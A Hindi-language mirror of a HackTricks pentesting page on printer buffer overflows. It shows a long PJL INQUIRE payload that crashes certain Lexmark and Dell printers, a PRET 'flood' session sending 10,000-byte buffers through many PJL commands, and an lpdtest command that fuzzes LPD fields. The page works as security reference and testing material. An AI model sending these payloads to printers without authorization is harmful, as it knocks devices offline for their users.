mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
74 lines
7.7 KiB
Markdown
74 lines
7.7 KiB
Markdown
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
|
|
|
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
|
|
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
|
|
|
|
</details>
|
|
|
|
|
|
# PJL
|
|
|
|
विभिन्न _Lexmark_ लेजर प्रिंटर्स क्रैश हो जाते हैं जब उन्हें INQUIRE तर्क के रूप में लगभग 1,000 वर्ण प्राप्त होते हैं (देखें [CVE-2010-0619](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619)) और _Dell 1720n_ को लगभग 3,000 वर्णों के रूप में SET तर्क भेजने पर उपकरण क्रैश हो जाता है:
|
|
```
|
|
@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…
|
|
```
|
|
आप [**PRET**](https://github.com/RUB-NDS/PRET) का उपयोग करके बफर ओवरफ्लो की जांच कर सकते हैं:
|
|
```bash
|
|
./pret.py -q printer pjl
|
|
Connection to printer established
|
|
|
|
Welcome to the pret shell. Type help or ? to list commands.
|
|
printer:/> flood
|
|
Buffer size: 10000, Sending: @PJL SET [buffer]
|
|
Buffer size: 10000, Sending: @PJL [buffer]
|
|
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
|
|
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
|
|
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
|
|
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
|
|
Buffer size: 10000, Sending: @PJL INFO [buffer]
|
|
Buffer size: 10000, Sending: @PJL ECHO [buffer]
|
|
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
|
|
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
|
|
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
|
|
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
|
|
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
|
|
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
|
|
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
|
|
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
|
|
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"
|
|
```
|
|
# LPD डीमन
|
|
|
|
यह एक से अधिक उपयोगकर्ता-निर्धारित वेक्टरों को समर्थित करता है जैसे _जॉबनेम, उपयोगकर्ता नाम या होस्टनेम_, जो **पर्याप्त रूप से सुरक्षित नहीं हो सकते हैं।** इस खराबी से संबंधित कई संकट पहले से ही खोजे जा चुके हैं।
|
|
|
|
बफर ओवरफ्लो के लिए टेस्ट करने के लिए एक सरल **LPD फज़र** `lpdtest` उपकरण का उपयोग करके बनाया जा सकता है जो [PRET](https://github.com/RUB-NDS/PRET) में **शामिल** है। `in` तर्क ने LPD प्रोटोकॉल द्वारा परिभाषित सभी उपयोगकर्ता इनपुट को एक निश्चित मान (इस मामले में, Python आउटपुट) पर सेट किया है:
|
|
```bash
|
|
./lpdtest.py printer in "`python -c 'print "x"*150'`"
|
|
```
|
|
**इन हमलों के बारे में अधिक जानकारी आप** [**http://hacking-printers.net/wiki/index.php/Buffer\_overflows**](http://hacking-printers.net/wiki/index.php/Buffer\_overflows) **में पा सकते हैं।**
|
|
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें!
|
|
|
|
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
|
|
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।**
|
|
|
|
- **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
|
|
|
|
</details>
|